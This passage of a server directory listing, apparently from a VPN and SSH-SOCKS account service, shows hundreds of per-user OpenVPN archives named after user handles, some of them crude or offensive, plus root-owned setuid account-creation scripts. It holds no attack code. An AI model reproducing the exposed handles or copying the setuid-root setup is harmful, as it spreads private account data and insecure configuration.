Nappo10976_OPENVPN.tgz +-rw-r--r-- 1 root root 3401 Aug 10 13:09 Nighty5510_OPENVPN.tgz +-rw-r--r-- 1 root root 3611 Jun 3 2010 Nop0x29828_OPENVPN.tgz +-rw-r--r-- 1 root root 3616 May 27 2010 Oldsql26067_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Sep 23 01:42 Pasi6512495_OPENVPN.tgz +-rw-r--r-- 1 root root 3632 Jul 10 00:12 PeteSniff26963_OPENVPN.tgz +-rw-r--r-- 1 root root 3622 May 22 2010 Ph0nix4947_OPENVPN.tgz +-rw-r--r-- 1 root root 3635 Jun 29 2010 Phantonym17925_OPENVPN.tgz +-rw-r--r-- 1 root root 3573 Oct 26 05:43 Phiriun2823_OPENVPN.tgz +-rw-r--r-- 1 root root 3409 Dec 10 17:07 Pitbull6910648_OPENVPN.tgz +-rw-r--r-- 1 root root 3615 Jun 25 2010 Pl0051690_OPENVPN.tgz +-rw-r--r-- 1 root root 3602 Nov 28 08:39 Poseidon10572_OPENVPN.tgz +-rw-r--r-- 1 root root 3600 Aug 16 21:45 PostMort3m12175_OPENVPN.tgz +-rw-r--r-- 1 root root 3422 Sep 2 19:56 Prager28005_OPENVPN.tgz +-rw-r--r-- 1 root root 3614 Jun 21 2010 Prager2997_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 Aug 24 16:50 Predat0r20106_OPENVPN.tgz +-rw-r--r-- 1 root root 3596 Jul 13 18:11 Predat0r9093_OPENVPN.tgz +-rw-r--r-- 1 root root 3620 Jun 13 2010 Profi13618_OPENVPN.tgz +-rw-r--r-- 1 root root 3623 Aug 2 01:50 Pussyrider12591_OPENVPN.tgz +-rw-r--r-- 1 root root 3609 Sep 7 02:28 Pussyrider2553_OPENVPN.tgz +-rw-r--r-- 1 root root 3621 Jul 5 2010 Pwhoam7437_OPENVPN.tgz +-rw-r--r-- 1 root root 3414 Nov 23 23:34 QuickSilver30900_OPENVPN.tgz +-rw-r--r-- 1 root root 3436 Jun 8 2010 R0MANCE30753_OPENVPN.tgz +-rw-r--r-- 1 root root 3628 Jun 29 2010 Raiden19032_OPENVPN.tgz +-rw-r--r-- 1 root root 3406 Nov 21 20:34 Rambo020232438_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Oct 4 16:22 Rambo02026184_OPENVPN.tgz +-rw-r--r-- 1 root root 3573 Jul 18 16:28 Raser8912111_OPENVPN.tgz +-rw-r--r-- 1 root root 3584 Oct 19 23:52 Ratte15435_OPENVPN.tgz +-rw-r--r-- 1 root root 3575 Oct 20 00:50 Ratte29885_OPENVPN.tgz +-rw-r--r-- 1 root root 3573 Aug 8 14:34 Revar13568_OPENVPN.tgz +-rw-r--r-- 1 root root 3579 Sep 13 20:35 Revar186_OPENVPN.tgz +-rw-r--r-- 1 root root 3415 Aug 3 00:36 Rodney29032_OPENVPN.tgz +-rw-r--r-- 1 root root 3602 Sep 13 18:11 S3t4p3x311542_OPENVPN.tgz +-rw-r--r-- 1 root root 3406 Dec 14 12:26 Sa1nt856432005_OPENVPN.tgz +-rw-r--r-- 1 root root 3403 Sep 22 02:07 SaCuSkill19539_OPENVPN.tgz +-rw-r--r-- 1 root root 3430 Jun 3 2010 Scanner22720_OPENVPN.tgz +-rw-r--r-- 1 root root 3405 Dec 27 17:07 Senninmod9366_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Dec 11 17:13 SilverFox12282_OPENVPN.tgz +-rw-r--r-- 1 root root 3574 Aug 29 20:49 SilverS14224_OPENVPN.tgz +-rw-r--r-- 1 root root 3431 May 15 2010 SilverS18699_OPENVPN.tgz +-rw-r--r-- 1 root root 3578 Oct 2 10:17 SilverS29996_OPENVPN.tgz +-rw-r--r-- 1 root root 3590 Nov 1 15:44 SlamD7819_OPENVPN.tgz +-rw-r--r-- 1 root root 3596 Nov 21 22:25 SleepyHollow30848_OPENVPN.tgz +-rw-r--r-- 1 root root 3574 Aug 20 05:00 Slumski15259_OPENVPN.tgz +-rw-r--r-- 1 root root 3404 Dec 11 17:30 SmileNike4939_OPENVPN.tgz +-rw-r--r-- 1 root root 3628 Jun 25 2010 SonnyBlack761_OPENVPN.tgz +-rw-r--r-- 1 root root 3414 Nov 18 20:30 Sparkasse19880_OPENVPN.tgz +-rw-r--r-- 1 root root 3427 Jun 16 2010 Standex637_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Nov 7 23:40 Star1711657_OPENVPN.tgz +-rw-r--r-- 1 root root 3407 Oct 14 20:11 Stejin14830_OPENVPN.tgz +-rw-r--r-- 1 root root 3411 Nov 29 13:23 Stejin27979_OPENVPN.tgz +-rw-r--r-- 1 root root 3621 Jun 9 2010 SunDay5117_OPENVPN.tgz +-rw-r--r-- 1 root root 3583 Sep 27 09:43 Swiss8114_OPENVPN.tgz +-rw-r--r-- 1 root root 3572 Jul 17 22:38 Sylcore21775_OPENVPN.tgz +-rw-r--r-- 1 root root 3561 Jul 16 03:23 Sylcore27550_OPENVPN.tgz +-rw-r--r-- 1 root root 3627 Jul 2 2010 Syntex31511_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 Nov 4 06:13 TARTAROS15648_OPENVPN.tgz +-rw-r--r-- 1 root root 3411 Jul 18 13:57 Thnallgzt1355_OPENVPN.tgz +-rw-r--r-- 1 root root 3613 Dec 13 06:07 Thunder052_OPENVPN.tgz +-rw-r--r-- 1 root root 3403 Oct 17 17:16 Tiberius121180_OPENVPN.tgz +-rw-r--r-- 1 root root 3605 Aug 20 21:22 Tiberius25495_OPENVPN.tgz +-rw-r--r-- 1 root root 3420 Aug 29 17:10 Torbon5467_OPENVPN.tgz +-rw-r--r-- 1 root root 3597 Oct 4 01:41 Trinx15364_OPENVPN.tgz +-rw-r--r-- 1 root root 3581 Nov 22 00:54 Trinx24908_OPENVPN.tgz +-rw-r--r-- 1 root root 3593 Aug 29 21:56 Trinx31242_OPENVPN.tgz +-rw-r--r-- 1 root root 3582 Jul 11 18:39 Trinx9318_OPENVPN.tgz +-rw-r--r-- 1 root root 3408 Jul 15 21:27 Tronic24834_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Jul 18 21:32 Tronic32029_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 May 17 2010 Tweaknap31697_OPENVPN.tgz +-rw-r--r-- 1 root root 3417 Sep 16 14:41 Tzolli11813_OPENVPN.tgz +-rw-r--r-- 1 root root 3414 Sep 17 00:26 Tzolli12805_OPENVPN.tgz +-rw-r--r-- 1 root root 3634 Jul 2 2010 Tzolli31127_OPENVPN.tgz +-rw-r--r-- 1 root root 3626 Jun 1 2010 Tzolli530_OPENVPN.tgz +-rw-r--r-- 1 root root 3582 Oct 22 01:07 Ukash31388_OPENVPN.tgz +-rw-r--r-- 1 root root 3581 Oct 5 15:59 WEEDtwo23015_OPENVPN.tgz +-rw-r--r-- 1 root root 3557 Dec 14 17:42 WEEDtwo358_OPENVPN.tgz +-rw-r--r-- 1 root root 3570 Oct 18 17:52 WalterW26039_OPENVPN.tgz +-rw-r--r-- 1 root root 3567 Dec 1 14:47 WalterW5032_OPENVPN.tgz +-rw-r--r-- 1 root root 3616 Jul 10 16:28 WeArEoNe5813_OPENVPN.tgz +-rw-r--r-- 1 root root 3632 Jul 1 2010 Weichei4520239_OPENVPN.tgz +-rw-r--r-- 1 root root 3609 Nov 21 22:43 Wursteintopf1171_OPENVPN.tgz +-rw-r--r-- 1 root root 3614 Jul 9 2010 X3N0N8545_OPENVPN.tgz +-rw-r--r-- 1 root root 3576 Nov 1 20:31 Xeral1887_OPENVPN.tgz +-rw-r--r-- 1 root root 3578 Sep 13 21:52 Zerox8831175_OPENVPN.tgz +-rw-r--r-- 1 root root 3571 Nov 7 19:55 Zorator17384_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Jul 17 18:58 Zuraaa30069_OPENVPN.tgz +-rw-r--r-- 1 root root 387 Sep 17 00:14 addSSHuser.php +-rw-r--r-- 1 root root 280 Sep 17 00:14 addVPNuser.php +-rw-r--r-- 1 root root 3574 Sep 1 00:39 adios21334_OPENVPN.tgz +-rw-r--r-- 1 root root 3610 Nov 27 13:43 adminadmin663_OPENVPN.tgz +-rw-r--r-- 1 root root 3395 Dec 24 05:38 analytics23444_OPENVPN.tgz +-rw-r--r-- 1 root root 3408 Dec 18 08:46 andreas741128201_OPENVPN.tgz +-rw-r--r-- 1 root root 3411 Sep 25 10:41 anonymius696_OPENVPN.tgz +-rw-r--r-- 1 root root 3430 Jul 6 2010 anoobis20036_OPENVPN.tgz +-rw-r--r-- 1 root root 3628 Jun 18 2010 asd12322807_OPENVPN.tgz +-rw-r--r-- 1 root root 3411 Aug 2 22:29 asd12326649_OPENVPN.tgz +-rw-r--r-- 1 root root 3414 Aug 3 18:40 asd12328521_OPENVPN.tgz +-rw-r--r-- 1 root root 3621 Jun 25 2010 asd1233886_OPENVPN.tgz +-rw-r--r-- 1 root root 3415 Jul 20 19:54 asdfg12345627545_OPENVPN.tgz +-rw-r--r-- 1 root root 3405 Nov 2 15:47 asdfghjkl27874_OPENVPN.tgz +-rw-r--r-- 1 root root 3564 Dec 10 07:39 awesome50_OPENVPN.tgz +-rw-r--r-- 1 root root 3589 Nov 9 15:31 b0uNz18610_OPENVPN.tgz +-rw-r--r-- 1 root root 3594 Dec 2 22:03 b111124378_OPENVPN.tgz +-rw-r--r-- 1 root root 3411 Oct 24 03:30 b14ckf1ag13016_OPENVPN.tgz +-rw-r--r-- 1 root root 3411 Dec 15 15:30 b14ckf1ag14907_OPENVPN.tgz +-rw-r--r-- 1 root root 3579 Oct 4 17:00 b7231244_OPENVPN.tgz +-rw-r--r-- 1 root root 3578 Nov 21 03:08 b72317220_OPENVPN.tgz +-rw-r--r-- 1 root root 3579 Oct 20 04:19 b72337515_OPENVPN.tgz +-rw-r--r-- 1 root root 3596 Nov 9 01:37 bLackftw19898791_OPENVPN.tgz +-rw-r--r-- 1 root root 3602 Oct 11 20:18 badboy10125461_OPENVPN.tgz +-rw-r--r-- 1 root root 3579 Jul 17 23:40 bambuss3686_OPENVPN.tgz +-rw-r--r-- 1 root root 3419 Sep 9 20:38 basics14055_OPENVPN.tgz +-rw-r--r-- 1 root root 3581 Dec 27 16:44 becks1088_OPENVPN.tgz +-rw-r--r-- 1 root root 3587 Nov 5 18:26 becks1540_OPENVPN.tgz +-rw-r--r-- 1 root root 3406 Nov 7 19:27 bergi181219604_OPENVPN.tgz +-rw-r--r-- 1 root root 3576 Aug 15 01:15 bigtwin25561_OPENVPN.tgz +-rw-r--r-- 1 root root 3397 Jul 13 12:56 blackcell12902_OPENVPN.tgz +-rw-r--r-- 1 root root 3641 Jun 11 2010 blackcell1900_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 Aug 14 18:25 bloodyrain6388_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 Jun 3 2010 bluballa28446_OPENVPN.tgz +-rw-r--r-- 1 root root 3584 Nov 10 20:41 bobby11515_OPENVPN.tgz +-rw-r--r-- 1 root root 3576 Aug 12 14:55 bobby15402_OPENVPN.tgz +-rw-r--r-- 1 root root 3582 Sep 17 03:28 bobby1638_OPENVPN.tgz +-rw-r--r-- 1 root root 3583 Dec 11 14:06 bobby7804_OPENVPN.tgz +-rw-r--r-- 1 root root 3583 Oct 18 18:37 cafe116337_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 Aug 14 21:49 cardercarder18567_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Jul 7 2010 cardercarder21402_OPENVPN.tgz +-rw-r--r-- 1 root root 3593 Dec 12 19:16 cardercarder31297_OPENVPN.tgz +-rw-r--r-- 1 root root 3588 Sep 14 07:54 cardercarder6893_OPENVPN.tgz +-rw-r--r-- 1 root root 3585 Oct 28 02:05 cardercarder8070_OPENVPN.tgz +-rw-r--r-- 1 root root 3416 Oct 15 01:29 carlos3914_OPENVPN.tgz +-rw-r--r-- 1 root root 3564 Nov 23 05:29 cayenne10018_OPENVPN.tgz +-rw-r--r-- 1 root root 3605 Jul 21 17:29 checka1220438_OPENVPN.tgz +-rw-r--r-- 1 root root 3404 Dec 28 14:48 chessy33331564_OPENVPN.tgz +-rw-r--r-- 1 root root 3406 Sep 29 16:28 chessy3333215_OPENVPN.tgz +-rw-r--r-- 1 root root 3403 Nov 26 12:28 chiller133713287_OPENVPN.tgz +-rw-r--r-- 1 root root 3421 Dec 29 11:22 chiller13378063_OPENVPN.tgz +-rw-r--r-- 1 root root 3409 Sep 10 00:34 chip998558_OPENVPN.tgz +-rw-r--r-- 1 root root 3611 Dec 7 09:16 conviction28712_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 Oct 28 01:20 conviction6444_OPENVPN.tgz +-rw-r--r-- 1 root root 3623 Jul 8 2010 coolio13949_OPENVPN.tgz +-rw-r--r-- 1 root root 3575 Sep 5 22:43 crack9164_OPENVPN.tgz +-rwsr-sr-x 1 root root 700 May 9 2010 createSSHsocks.sh +-rwsr-sr-x 1 root root 518 May 11 2010 createVPN.sh +-rw-r--r-- 1 root root 3412 Jul 17 20:49 crypt012465_OPENVPN.tgz +-rw-r--r-- 1 root root 3569 Oct 27 16:38 cryptus4764_OPENVPN.tgz +-rw-r--r-- 1 root root 3598 Sep 11 19:15 cunit15618415_OPENVPN.tgz +-rw-r--r-- 1 root root 3590 Aug 11 14:44 cunit15619893_OPENVPN.tgz +-rw-r--r-- 1 root root 3593 Nov 9 23:03 cunit15624106_OPENVPN.tgz +-rw-r--r-- 1 root root 3565 Jul 23 15:14 d0ne0ne32695_OPENVPN.tgz +-rw-r--r-- 1 root root 3607 Dec 30 22:11 darkt0wn15874_OPENVPN.tgz +-rw-r--r-- 1 root root 3611 Nov 26 19:37 darkt0wn3662_OPENVPN.tgz +-rw-r--r-- 1 root root 3423 Jun 11 2010 dasemih10582_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 Aug 9 03:01 denniswolf15380_OPENVPN.tgz +-rw-r--r-- 1 root root 3611 Sep 8 17:06 denniswolf975_OPENVPN.tgz +-rw-r--r-- 1 root root 3611 May 31 2010 desaster30502_OPENVPN.tgz +-rw-r--r-- 1 root root 3609 Jul 10 15:33 det0x10826_OPENVPN.tgz +-rw-r--r-- 1 root root 3614 Jun 6 2010 det0x25144_OPENVPN.tgz +-rw-r--r-- 1 root root 3607 May 16 2010 det0x6693_OPENVPN.tgz +-rw-r--r-- 1 root root 3586 Dec 5 20:40 dex9030410_OPENVPN.tgz +-rw-r--r-- 1 root root 3405 Aug 29 19:38 dinara3242_OPENVPN.tgz +-rw-r--r-- 1 root root 3603 Aug 18 17:42 docscanner11883_OPENVPN.tgz +-rw-r--r-- 1 root root 3600 Dec 10 20:19 docscanner15891_OPENVPN.tgz +-rw-r--r-- 1 root root 3612 Oct 24 17:48 docscanner6161_OPENVPN.tgz +-rw-r--r-- 1 root root 3602 Oct 22 14:14 dome250310063_OPENVPN.tgz +-rw-r--r-- 1 root root 3407 Aug 24 16:08 donkey17577_OPENVPN.tgz +-rw-r--r-- 1 root root 3594 Nov 24 19:26 dpgc201011939_OPENVPN.tgz +-rw-r--r-- 1 root root 3422 Nov 7 23:02 dreckz7739_OPENVPN.tgz +-rw-r--r-- 1 root root 3605 Nov 22 18:25 drhandel18818_OPENVPN.tgz +-rw-r--r-- 1 root root 3410 Nov 27 11:04 drweed7100_OPENVPN.tgz +-rw-r--r-- 1 root root 3579 Nov 19 01:43 duden16363_OPENVPN.tgz +-rw-r--r-- 1 root root 3578 Oct 27 22:52 dudex20927_OPENVPN.tgz +-rw-r--r-- 1 root root 3586 Sep 12 18:50 dudex29255_OPENVPN.tgz +-rw-r--r-- 1 root root 3439 Jun 1 2010 e5e1llo30858_OPENVPN.tgz +-rw-r--r-- 1 root root 3573 Nov 4 23:11 eater15817_OPENVPN.tgz +-rw-r--r-- 1 root root 3418 Oct 27 19:21 eddinc12916_OPENVPN.tgz +-rw-r--r-- 1 root root 3581 Jan 3 15:05 elektro27327_OPENVPN.tgz +-rw-r--r-- 1 root root 3560 Nov 30 15:30 elektro6996_OPENVPN.tgz +-rw-r--r-- 1 root root 3585 Jul 15 00:05 elit327890_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Nov 18 12:14 epoepo25324_OPENVPN.tgz +-rw-r--r-- 1 root root 3600 Jul 14 20:26 f1resp1n9199_OPENVPN.tgz +-rw-r--r-- 1 root root 3589 Nov 8 01:59 finnq10545_OPENVPN.tgz +-rw-r--r-- 1 root root 3426 Oct 23 21:19 fluxay4913_OPENVPN.tgz +-rw-r--r-- 1 root root 3576 Sep 4 01:34 forza12423_OPENVPN.tgz +-rw-r--r-- 1 root root 3599 Aug 24 21:30 fragezeichen14241_OPENVPN.tgz +-rw-r--r-- 1 root root 3602 Oct 5 16:36 fragezeichen3542_OPENVPN.tgz +-rw-r--r-- 1 root root 3603 Nov 26 23:39 frankylo18404_OPENVPN.tgz +-rw-r--r-- 1 root root 3423 Nov 6 03:30 freaky11488_OPENVPN.tgz +-rw-r--r-- 1 root root 3406 Nov 29 12:11 freshestman14998_OPENVPN.tgz +-rw-r--r-- 1 root root 3416 Sep 7 02:44 freshestman20055_OPENVPN.tgz +-rw-r--r-- 1 root root 3410 Oct 15 15:11 freshestman28233_OPENVPN.tgz +-rw-r--r-- 1 root root 3611 Nov 16 01:27 fuckdawn12660_OPENVPN.tgz +-rw-r--r-- 1 root root 3417 Jul 20 01:30 galaxi12741_OPENVPN.tgz +-rw-r--r-- 1 root root 3410 Jul 19 22:52 galaxi15585_OPENVPN.tgz +-rw-r--r-- 1 root root 3418 Oct 2 23:53 galaxi18086_OPENVPN.tgz +-rw-r--r-- 1 root root 3411 Oct 30 02:40 gehtes5036_OPENVPN.tgz +-rw-r--r-- 1 root root 3408 Oct 28 05:45 genetik1015054_OPENVPN.tgz +-rw-r--r-- 1 root root 3606 Jun 8 2010 godfella23150_OPENVPN.tgz +-rw-r--r-- 1 root root 3418 Nov 3 00:53 ground22054_OPENVPN.tgz +-rw-r--r-- 1 root root 3577 Sep 22 02:09 groundy30694_OPENVPN.tgz +-rw-r--r-- 1 root root 3423 Aug 4 00:04 h2d2e218599_OPENVPN.tgz +-rw-r--r-- 1 root root 3590 Aug 6 19:39 h3l0x29397_OPENVPN.tgz +-rw-r--r-- 1 root root 3609 Jun 28 2010 h3l0x3097_OPENVPN.tgz +-rw-r--r-- 1 root root 3612 May 27 2010 h3l0x31602_OPENVPN.tgz +-rw-r--r-- 1 root root 3590 Oct 16 21:20 h3l0x32259_OPENVPN.tgz +-rw-r--r-- 1 root root 3576 Sep 6 23:03 h3l0x4320_OPENVPN.tgz +-rw-r--r-- 1 root root 3416 Dec 6 13:04 habadu5745_OPENVPN.tgz +-rw-r--r-- 1 root root 3406 Sep 22 11:39 hackbart231851_OPENVPN.tgz +-rw-r--r-- 1 root root 3406 Nov 13 22:57 hackbart24778_OPENVPN.tgz +-rw-r--r-- 1 root root 3607 Oct 31 23:11 hackoman8853_OPENVPN.tgz +-rw-r--r-- 1 root root 3592 Aug 18 15:47 haddemann1235295_OPENVPN.tgz +-rw-r--r-- 1 root root 3593 Jul 12 15:15 hallo12322143_OPENVPN.tgz +-rw-r--r-- 1 root root 3416 Sep 4 01:51 hallo50505023476_OPENVPN.tgz +-rw-r--r-- 1 root root 3596 Nov 28 20:53 hans200020336_OPENVPN.tgz +-rw-r--r-- 1 root root 3407 Dec 4 19:35 hanshans12322721_OPENVPN.tgz +-rw-r--r-- 1 root root 3406 Sep 18 18:05 hanswurst4277_OPENVPN.tgz +-rw-r--r-- 1 root root 3406 Nov 20 14:42 hanswurst961_OPENVPN.tgz +-rw-r--r-- 1 root root 3615 Nov 4 02:00 haooosii22019_OPENVPN.tgz +-rw-r--r-- 1 root root 3628 Jul 8 2010 hasenp0wer1224_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Jul 12 16:53 hexst4tic15575_OPENVPN.tgz +-rw-r--r-- 1 root root 3421 Nov 6 17:30 hexst4tic20328_OPENVPN.tgz +-rw-r--r-- 1 root root 3413 Sep 25 12:59 hexst4tic22131_OPENVPN.tgz +-rw-r--r-- 1 root root 3391 Aug 23 16:21 hexst4tic24446_OPENVPN.tgz +-rw-r--r-- 1 root root 3635 Jun 9 2010 hexst4tic31381_OPENVPN.tgz +-rw-r--r-- 1 root root 3396 Jul 12 02:43 hexst4tic7086_OPENVPN.tgz +-rw-r--r-- 1 root root 3396 Oct 26 02:49 heyhey12325893_OPENVPN.tgz +-rw-r--r-- 1 root root 3583 Jan 2 23:36 hi31757_OPENVPN.tgz +-rw-r--r-- 1 root root 3609 Dec 8 16:47 hung23046577_OPENVPN.tgz +-rw-r--r-- 1 root root 3404 Oct 20 00:23 hushbaits3027_OPENVPN.tgz +-rw-r--r-- 1 root root 3407 Dec 1 09:21 hushbaits8016_OPENVPN.tgz +-rw-r--r-- 1 root root 3437 Jul 2 2010 ibrains20948_OPENVPN.tgz +-rw-r--r-- 1 root root 3564 Nov 27 22:57 illegal9593_OPENVPN.tgz +-rw-r--r-- 1 root root 3 May 11 2010 index.htm +-rw-r--r-- 1 root root 2 Sep 17 03:05 index.html +-rw-r--r-- 1 root root 3634 Jul 11 16:09 inexcussus16748_OPENVPN.tgz +-rw-r--r-- 1 root root 3574 Jul 25 20:18 j9ker8731371_OPENVPN.tgz +-rw-r--r-- 1 root root 3567 Oct 30 17:44 jack12330743_OPENVPN.tgz +-rw-r--r-- 1 root root 3403 Aug 5 00:16 jiansa17539_OPENVPN.tgz +-rw-r--r-- 1 root root 3601 Nov 25 20:03 johan12328730_OPENVPN.tgz +-rw-r--r-- 1 root root 3609 Jun 18 2010 johny3288_OPENVPN.tgz +-rw-r--r-- 1 root root 3584 Aug 20 15:20 jokereloaded3875_OPENVPN.tgz +-rw-r--r-- 1 root root 3607 May 11 2010 juden20060_OPENVPN.tgz +-rw-r--r-- 1 root root 3593 Nov 28 11:39 juegoray1353_OPENVPN.tgz +-rw-r--r-- 1 root root 3408 Nov 9 17:01 juicestin20280_OPENVPN.tgz +-rw-r--r-- 1 root root 3423 Nov 21 20:15 juliasutter2672_OPENVPN.tgz +-rw-r--r-- 1 root root 3420 Oct 24 18:42 kaiser6131_OPENVPN.tgz +-rw-r--r-- 1 root root 3561 Jul 16 01:38 kaliber14521_OPENVPN.tgz +-rw-r--r-- 1 root root 3583 Dec 10 21:41 kalle4534_OPENVPN.tgz +-rw-r--r-- 1 root root 3619 Jul 8 2010 kdkdkd23140_OPENVPN.tgz +-rw-r--r-- 1 root root 3396 Dec 10 19:17 kevin4ual20601_OPENVPN.tgz +-rw-r--r-- 1 root root 3614 May 17 2010 keystyle14572_OPENVPN.tgz +-rw-r--r-- 1 root root 3397 Oct 22 02:19 kingding114185_OPENVPN.tgz +-rw-r--r-- 1 root root 3573 Dec 12 17:04 kingpok30006_OPENVPN.tgz +-rw-r--r-- 1 root root 3577 Oct 19 14:30 kirmi16980_OPENVPN.tgz +-rw-r--r-- 1 root root 3579 Sep 10 11:50 kirmi17897_OPENVPN.tgz +-rw-r--r-- 1 root root 3583 Aug 3 12:32 kirmi21804_OPENVPN.tgz +-rw-r--r-- 1 root root 3584 Dec 8 12:39 kirmi24669_OPENVPN.tgz +-rw-r--r-- 1 root root 3394 Jul 19 15:09 kitanamea14934_OPENVPN.tgz +-rw-r--r-- 1 root root 3564 Sep 13 20:16 klaudio18199_OPENVPN.tgz +-rw-r--r-- 1 root root 3572 Oct 13 23:44 knochen12287_OPENVPN.tgz +-rw-r--r-- 1 root root 3581 Aug 26 17:50 kobra25894_OPENVPN.tgz +-rw-r--r-- 1 root root 3584 Nov 11 19:06 kobra28854_OPENVPN.tgz +-rw-r--r-- 1 root root 3401 Sep 2 22:18 koksi13379157_OPENVPN.tgz +-rw-r--r-- 1 root root 3606 Sep 22 23:26 kollegah14227_OPENVPN.tgz +-rw-r--r-- 1 root root 3603 Nov 19 17:54 kollegah19696_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 Jul 15 18:05 kollegah9876_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Jul 21 15:55 kopfnuss1233390_OPENVPN.tgz +-rw-r--r-- 1 root root 3578 Nov 30 09:05 kstARRR29974_OPENVPN.tgz +-rw-r--r-- 1 root root 3416 Dec 15 15:22 lacezl11349_OPENVPN.tgz +-rw-r--r-- 1 root root 3572 Jul 15 14:07 lafesse135_OPENVPN.tgz +-rw-r--r-- 1 root root 3573 Jul 17 21:19 larusso24610_OPENVPN.tgz +-rw-r--r-- 1 root root 3605 Dec 10 05:07 latestnews13082_OPENVPN.tgz +-rw-r--r-- 1 root root 3603 Oct 30 07:58 latestnews14060_OPENVPN.tgz +-rw-r--r-- 1 root root 3418 May 15 2010 letharg30647_OPENVPN.tgz +-rw-r--r-- 1 root root 3601 Jul 20 01:31 levision22813_OPENVPN.tgz +-rw-r--r-- 1 root root 3595 Jul 19 01:07 levision26609_OPENVPN.tgz +drwxr-xr-x 2 root root 4096 Sep 17 03:05 lighttpd +-rw-r--r-- 1 root root 3621 May 14 2010 lilg9427854_OPENVPN.tgz +-rw-r--r-- 1 root root 3570 Jul 29 03:31 lolilol5992_OPENVPN.tgz +-rw-r--r-- 1 root root 3589 Oct 1 00:06 loopi2628_OPENVPN.tgz +-rw-r--r-- 1 root root 3599 Sep 5 22:47 lorenzstyler30043_OPENVPN.tgz +-rw-r--r-- 1 root root 3588 Sep 9 15:14 lpboy15438_OPENVPN.tgz +-rw-r--r-- 1 root root 3584 Nov 28 11:20 lpboy32147_OPENVPN.tgz +-rw-r--r-- 1 root root 3583 Dec 21 20:30 luden29299_OPENVPN.tgz +-rw-r--r-- 1 root root 3608 Jul 11 17:42 lykantos5842_OPENVPN.tgz +-rw-r--r-- 1 root root 3605 Dec 2 11:04 mablutze15734_OPENVPN.tgz +-rw-r--r-- 1 root root 3614 Jan 2 11:48 mablutze20061_OPENVPN.tgz +-rw-r--r-- 1 root root 3618 Jul 2 2010 maddin9319817_OPENVPN.tgz +-rw-r--r-- 1 root root 3582 Nov 1 16:20 makko10328_OPENVPN.tgz +-rw-r--r-- 1 root root 3585 Aug 13 22:07 makko15206_OPENVPN.tgz +-rw-r--r-- 1 root root 3616 Jun 12 2010 makko27543_OPENVPN.tgz +-rw-r--r-- 1 root root 3606 Dec 19 12:10 malakas23496_OPENVPN.tgz +-rw-r--r-- 1 root root 3402 Oct 26 03:21 malakas32654_OPENVPN.tgz +-rw-r--r-- 1 root root 3570 Dec 5 13:21 malikop20421_OPENVPN.tgz +-rw-r--r-- 1 root root 3602 Aug 8 02:15 mani199323876_OPENVPN.tgz +-rw-r--r-- 1 root root 3577 Jul 13 00:29 maury27248_OPENVPN.tgz +-rw-r--r-- 1 root root 3582 Aug 20 18:57 mcott19555_OPENVPN.tgz +-rw-r--r-- 1 root root 3572 Oct 6 18:19 mcott7073_OPENVPN.tgz +-rw-r--r-- 1 root root 3587 Jul 13 11:39 mcott9631_OPENVPN.tgz +-rw-r--r-- 1 root root 3566 Aug 25 06:39 mesrine15658_OPENVPN.tgz +-rw-r--r-- 1 root root 3576 Oct 12 18:34 micki2219130_OPENVPN.tgz +-rw-r--r-- 1 root root 3583 Oct 4 19:37 mieze25868_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 Jul 30 23:15 mrfranzi20317_OPENVPN.tgz +-rw-r--r-- 1 root root 3583 Jul 18 22:23 murth934_OPENVPN.tgz +-rw-r--r-- 1 root root 3405 Oct 17 04:31 muruk20094696_OPENVPN.tgz +-rw-r--r-- 1 root root 3611 Dec 17 13:08 muschigirl23085_OPENVPN.tgz +-rw-r--r-- 1 root root 3609 Sep 22 12:38 muschigirl28807_OPENVPN.tgz +-rw-r--r-- 1 root root 3570 Oct 4 22:31 n1C3A1r22801_OPENVPN.tgz +-rw-r--r-- 1 root root 3607 Nov 26 13:10 n3ot0xin7144_OPENVPN.tgz +-rw-r--r-- 1 root root 3409 Dec 21 21:57 nate2331513_OPENVPN.tgz +-rw-r--r-- 1 root root 3615 Jun 8 2010 navyraiser2256_OPENVPN.tgz +-rw-r--r-- 1 root root 3585 Aug 25 00:32 nemiz8610_OPENVPN.tgz +-rw-r--r-- 1 root root 3635 Jun 9 2010 nightmar330255_OPENVPN.tgz +-rw-r--r-- 1 root root 3621 Jul 11 18:06 numo874898_OPENVPN.tgz +-rw-r--r-- 1 root root 3592 Dec 2 14:11 obama12323355_OPENVPN.tgz +-rw-r--r-- 1 root root 3613 Jun 11 2010 obama12325666_OPENVPN.tgz +-rw-r--r-- 1 root root 3601 Oct 15 20:31 obama12325914_OPENVPN.tgz +-rw-r--r-- 1 root root 3420 Dec 19 18:26 oicw913539_OPENVPN.tgz +-rw-r--r-- 1 root root 3565 Aug 11 00:48 oxford123948_OPENVPN.tgz +-rw-r--r-- 1 root root 3629 Jun 2 2010 p0rt3m22208_OPENVPN.tgz +-rw-r--r-- 1 root root 3411 Nov 5 01:41 pURRRR806_OPENVPN.tgz +-rw-r--r-- 1 root root 3583 Dec 6 07:28 pan1c17070_OPENVPN.tgz +-rw-r--r-- 1 root root 3593 Oct 26 10:28 pan1c31582_OPENVPN.tgz +-rw-r--r-- 1 root root 3609 May 25 2010 pann021887_OPENVPN.tgz +-rw-r--r-- 1 root root 3406 Dec 7 22:03 papa421249_OPENVPN.tgz +-rw-r--r-- 1 root root 3432 Jun 14 2010 paranoy21693_OPENVPN.tgz +-rw-r--r-- 1 root root 3415 Dec 1 18:16 peters7031_OPENVPN.tgz +-rw-r--r-- 1 root root 3618 Jun 8 2010 plu5554340_OPENVPN.tgz +-rw-r--r-- 1 root root 3613 Jun 15 2010 powerarm9390_OPENVPN.tgz +-rw-r--r-- 1 root root 3408 